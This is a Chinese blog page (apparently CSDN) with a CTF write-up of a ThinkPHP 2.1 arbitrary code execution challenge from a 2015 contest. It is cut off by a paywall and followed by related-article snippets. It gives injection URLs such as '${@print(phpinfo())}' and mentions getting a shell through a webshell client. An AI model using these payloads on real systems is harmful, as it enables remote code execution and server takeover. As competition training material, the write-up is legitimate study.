2015中国网络安全大赛:框架漏洞真题

最新推荐文章于 2025-10-23 07:37:04 发布
原创 最新推荐文章于 2025-10-23 07:37:04 发布 · 6k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#thinkphp2.1 #getshell

本文主要介绍了2015年中国网络安全大赛中涉及的ThinkPHP2.1框架漏洞。通过收集信息,发现该网站存在ThinkPHP2.1的任意代码执行漏洞,可以构造特定URL进行利用,如打印版本信息和执行phpinfo()。此外,还展示了如何通过菜刀马链接实现getshell,并提及flag位于html目录下。

看题分析:打开网址,是一个后台登录,结合框架漏洞,想到了struts漏洞。

0x00 收集信息

发现网站不是struts架构,于是截包看了下数据,有所发现:


明显是一个ThinkPHP2.1的产品,直接搜索ThinkPHP2.1+漏洞,找到几篇任意代码执行的漏洞。

0x01 任意代码执行漏洞

根据说明(原理网上比较多,我这里就不陈述了,别人分析更好),构造利用URL

www.xxx.com/index.php/module/action/param1/${@print(THINK_VERSION)}


www.xxx.com/index.php/module/action/param1/${@print(phpinfo())}


菜刀马链接:

最低0.47元/天 解锁文章
2023年上海市浦东新区网络安全管理员决赛理论题样题
afei001
06-30 1359
XHU2NzJjXHU0ZWJhXHU2MjdmXHU2M2E1XHVhXHUwMDMxXHUwMDJlXHUwMDQzXHUwMDRlXHUwMDU2XHUwMDQ0XHU4YmMxXHU0ZTY2XHU2MzE2XHU2Mzk4XHVmZjFiXHVhXHUwMDM0XHUwMDJlXHU2ZTE3XHU5MDBmXHU2ZDRiXHU4YmQ1XHVmZjA4XHU0ZTAwXHU0ZTJhXHU3Y2ZiXHU3ZWRmXHUwMDMxXHUwMDMwXHUwMDMwXHUwMDMwXHUwMDUy
第七届山东省大学生网络安全技能大赛决赛writeup
CoolD's Blog
11-06 8058
先立个flag,以后每次比赛完都要复现写WP…
XXXXXXXXXXXXX
热门推荐
lusic01的专栏
04-16 11万+
Netflix主机性能监视工具Vector http://www.chinaz.com/web/2015/0414/398451.shtml     云雀科技是总部位于西雅图的新兴的云服务公司,利用业界 最新技术打造下一代具有高密度动态计算能力的云平台。     Current Openings   Bootstrap,来自 Twitter,是目前最受欢迎的前端框架。Boo
vs2013或者2015界面个性化(更换背景、主题)
bin_ge_love的博客
06-09 9万+
如果你感觉到vs2013的深蓝白三个主题颜色你看的腻了,想换一换编码的心情,那么你就戳进来看看,教你怎么更换vs2013的背景图片,让你告别单调的色彩,从此编码的世界变得五彩缤纷,丰富多彩。。。。。
[理论题] 2025 年 “技耀泉城” 海右技能人才大赛网络安全知识竞赛题目
最新发布
2301_80284843的博客
10-23 883
解析:数据类型决定采集方式,不同场景下的数据需匹配对应的采集手段。解析:反序列化漏洞的原理是,应用程序在反序列化数据时,若未对数据合法性进行校验,攻击者可构造恶意序列化数据(如包含恶意代码的对象),应用程序反序列化后会执行其中的恶意代码,进而实现远程代码执行(如控制服务器、下载恶意程序),这是反序列化漏洞的典型危害,表述正确。在溯源场景中,鲁棒性不仅指水印提取能力,还包括面对数据篡改、攻击干扰时,溯源系统仍能准确定位攻击源头的能力,题目将其狭隘定义为 “水印提取”,与鲁棒性的完整概念不符,因此错误。
CTFHUB历年真题练习
qq_51558360的博客
10-11 1687
WebsiteManger 考点 布尔盲注、SSRF 尝试了一般登录方法没有反应。查看源码发现sql注入的利用点在图片上 盲注脚本 import string from requests import * allstr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~' myurl = 'http://challenge-1993b
信息安全比赛平台相关收集(CTF比赛)
我的学习笔记
07-12 2577
学习教程与材料: 1、http://www.hackingarticles.in/ 一个外国人的CTF比赛记录博客; 在线实战平台: 1、https://www.hackthebox.eu/home 在线练习题很多,值得看一看,注册时候需要做题的,网上有帮助; 比赛用工具:...
网络安全攻防大赛ctf题目
03-09
网络安全攻防大赛ctf题目
2024山东省职业院校技能大赛“网络空间安全”赛题及赛题解析(超详细)_2024年山东省职业院校技能大赛中职组网络安全赛项竞赛样题
2401_86951173的博客
09-11 1540
3.通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行访问,在登录界面中登录,登录成功后在成功的界面中找到FLAG并提交;
2022最新93道网络安全面试题合集】含答案解析
Hack0812的博客
11-18 2109
网络安全最新最全面试题合集,附答案解析、学习资料
CTF题目合集
cgygsw的博客
01-26 5316
在给定的代码中,call_user_func_array(array($this, $this->method), $this->args) 的作用是调用对象 $this 的方法 $this->method(也就是调用ping函数的方法 也就是destruct下面那个ping函数),并将 $this->args 数组作为参数传递给该方法。反序列化之后就会调用wakeup这个函数 : 这个函数的内容 是对参数的内容进行了循环遍历 执行WAF函数的内容。
2019全国大学生信息安全第一天线上初赛-情景模拟题(CTF)
04-21
本资料为2019全国大学生信息安全第一天线上初赛-情景模拟题,是个人答题的时候截下来的。分享给有需要的童鞋。
ctf网络安全攻防练习题
12-04
ctf网络安全攻防练习题 从N=NP能得到的结论当然是N=1或者P=0,然后结合图片内容,猜测此题跟二进制01有关,信息应该藏在像素中等等
网络安全攻防赛题目
06-02
网络攻防 题目
网络安全、信息安全大赛题目
05-14
信息安全比赛 题目 知识点 有好几个word文档
ctf大赛题目 格式为图片格式
08-03
ctf比赛的部分题目 格式为图片格式 英语 可以上手做联系用................................................................................
【CTF】 SSTI模板注入漏洞
ZhangAweio的博客
05-29 1068
SSTI 就是服务器端模板注入,当前使用的一些框架,比如python的flaskphp的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
2015中国网络安全大赛:Reinstall
forbidd3n,keep going
11-02 2878
看题分析:网站是一个MAO10 CMS的系统,直接关键字搜索,找到一篇《Mao10CMS前台Getshell》的文章。 0x00 收集信息 在www.mao10.com找到如下说明 //将程序上传到网站空间后,访问 http://你的域名/install.php 进行安装 0x01 install.php 直接加上后缀,直接404,应该没那么简单。既然方向是对的,install文件又
国赛网络安全试题A模块
m0_62689818的博客
11-09 586
网络安全国赛A模块试题
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值